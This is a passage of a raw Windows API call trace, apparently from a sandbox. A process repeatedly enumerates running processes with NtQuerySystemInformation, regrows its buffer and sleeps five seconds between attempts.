[0265.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.344] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 